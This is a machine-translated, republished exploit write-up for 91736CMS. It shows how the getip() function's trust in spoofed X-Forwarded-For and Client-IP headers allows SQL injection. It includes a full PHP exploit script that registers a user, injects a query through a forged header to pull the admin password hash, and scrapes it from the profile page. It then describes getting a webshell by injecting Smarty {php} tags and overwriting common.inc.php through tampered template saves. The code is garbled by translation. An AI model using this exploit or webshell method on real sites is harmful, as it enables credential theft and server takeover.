91736cms Getip SQL Injection & amp; WebShell

Source: Internet
Author: User
Tags smarty template

Author: Yaseng & Desperado
 
Team: CodePlay
 
Reading the source code in Chinaz reveals the evil GetIp ()
 
// Obtain the IP address
Function getip (){
If (getenv ("HTTP_CLIENT_IP ")){
$ Httpip = getenv ("HTTP_CLIENT_IP ");
Return $ httpip;
}
If (getenv ("HTTP_X_FORWARDED_FOR ")){
$ Httpip = getenv ("HTTP_X_FORWARDED_FOR ");
Return $ httpip;
}
If (getenv ("HTTP_X_FORWARDED ")){
$ Httpip = getenv ("HTTP_X_FORWARDED ");
Return $ httpip;
}
If (getenv ("HTTP_FORWARDED_FOR ")){
$ Httpip = getenv ("HTTP_FORWARDED_FOR ");
Return $ httpip;
}
If (getenv ("HTTP_FORWARDED ")){
$ Httpip = getenv ("HTTP_FORWARDED ");
Return $ httpip;
}
$ Httpip = $ _ SERVER ['remote _ ADDR '];
Return $ httpip;
}
Many cms are dead here
 
The principles of Baidu
 
Use curl in the command line
 
1. Open php. ini and enable extension = php_curl.dll.
 
2. Check the directory of the extension_dir value of php. ini and whether php_curl.dll exists,
If not, download php_curl.dll and copy libeay32.dll and ssleay32.dll from the php Directory
C: \ windows \ system32
 
Give exp directly
 
For details, see the attachment 91736.php.
 
Operation demonstration
 
 
 
I admit that the previous technology is very old.
 
Something new
 
The above tmd5 cracking requires money. I used the local demo to get the shell in the background and came to the background getShell.
 
Happy to see bird template Management
 
 
 
Click to edit
 
Visual Testing is the Smarty template engine.
 
{Php}
 
Phpinfo ();
 
{/Php}
 
 
 
Since Shit prohibits bird php labels
 
 
 
Can you change the template file name?
 
Tamper check the post package
 
 
 
Index.html is 1.php
 
 
 
Tragedy. You have to find out how to overwrite the PHP file.
 
The template directory is in the system \ templates \ default12 directory
 
Find a php file common. inc. php In system
 
Cover his sister's
 
Change the file in tamper to ../common. inc. php.
 
View common. inc. php
 
 
 
 
 
Successfully written to php (ps: This method is cumbersome
Will make the website rotten
We recommend that you replace or
I got a sentence and recovered it.) I tested the website and found that the latest version had an error.
 
I have time to study it.
 
Done !!!
 
CodePlay code audit exchange group 209547366 (common progress)
 
91736. php
 
<? Php
Print_r ('
+ --------------------------------------------------------------------------- +
91736CMS Getip () Remote SQL Injection Exploit
By CodePlay Team (Yaseng & Desperado)
If expoit success you can see get admin pass
+ --------------------------------------------------------------------------- +
');
If ($ argc <4)
{
Print_r ('
+ --------------------------------------------------------------------------- +
Example:
Php '. $ argv [0]. 'localhost name pass
+ --------------------------------------------------------------------------- +
');
Exit;
}
Error_reporting (3 );
Ini_set ('max _ execution_time ', 0 );
$ Host = $ argv [1];
$ Username = $ argv [2];
$ Password = $ argv [3];
// Register a user
$ StyleUrl = $ host. "/index. php? M = member & f = register_save ";
$ StyleData = "username = {$ username} & password = {$ password} & password2 = {$ password} & fields % 5 Btruename % 5D = {$ username} & fields % 5 bemail % 5D = {$ username} & submit = + % D7 % A2 + % B2 % E1 + ";
$ Ch = curl_init ($ styleUrl );
Curl_setopt ($ ch, CURLOPT_HEADER, 0 );
Curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, 1 );
Curl_setopt ($ ch, CURLOPT_POSTFIELDS, $ styleData );
Curl_setopt ($ ch, CURLOPT_POST, 1 );
$ Token = curl_exec ($ ch );
Curl_close ($ ch );
$ Cookie_file = tempnam ('./temp', 'cooker ');
$ Site = $ host;
$ Post_fields = "username = {$ username} & password = {$ password} & button = + % B5 % C7 % C2 % BC + ";
// Login packet www.2cto.com
$ Login_url = $ site. "/index. php? M = member & f = login_save ";
$ Cookie_file = tempnam ('./temp', 'cooker ');
$ Ch = curl_init ($ login_url );
Curl_setopt ($ ch, CURLOPT_HEADER, 0 );
Curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, 1 );
Curl_setopt ($ ch, CURLOPT_HTTPHEADER, array ('x-FORWARDED-FOR: fuck ', "CLIENT-IP: fuck by C.P. t', 'email '= (SELECT password FROM 'C _ admin'), 'logins' = 4 WHERE 'username' =' $ username '#"));
// Construct an IP address
Curl_setopt ($ ch, CURLOPT_POST, 1 );
Curl_setopt ($ ch, CURLOPT_POSTFIELDS, $ post_fields );
Curl_setopt ($ ch, CURLOPT_COOKIEJAR, $ cookie_file );
Curl_exec ($ ch );
Curl_close ($ ch );
$ StyleUrl = $ host. "/index. php? M = member & f = edit ";
$ StyleData = "";
$ Ch = curl_init ($ styleUrl );
Curl_setopt ($ ch, CURLOPT_HEADER, 0 );
Curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, 1 );
Curl_setopt ($ ch, CURLOPT_COOKIEFILE, $ cookie_file );
Curl_setopt ($ ch, CURLOPT_POSTFIELDS, $ styleData );
Curl_setopt ($ ch, CURLOPT_POST, 1 );
$ Data = curl_exec ($ ch );
Curl_close ($ ch );
$ Regex = "/id = \" email \ "(. *) <\/td>/I ";
Preg_match ($ regex, $ data, $ result );
$ Regex = "/value = \"(.*)\"/";
If (preg_match ($ regex, $ result [0], $ pass )){
Echo "shit pass:". $ pass [1]. "and login the admin Panel to getShell ";
}
Else {
Echo "fuck !!! You are field ";
}
?>

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.